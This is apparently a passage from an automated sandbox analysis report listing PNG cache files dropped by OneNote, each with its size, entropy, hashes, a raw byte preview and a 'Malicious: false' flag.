SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003E.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003F.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003G.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003H.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003I.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003J.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003K.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003Q.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003R.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003S.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003T.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003U.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003V.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000040.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
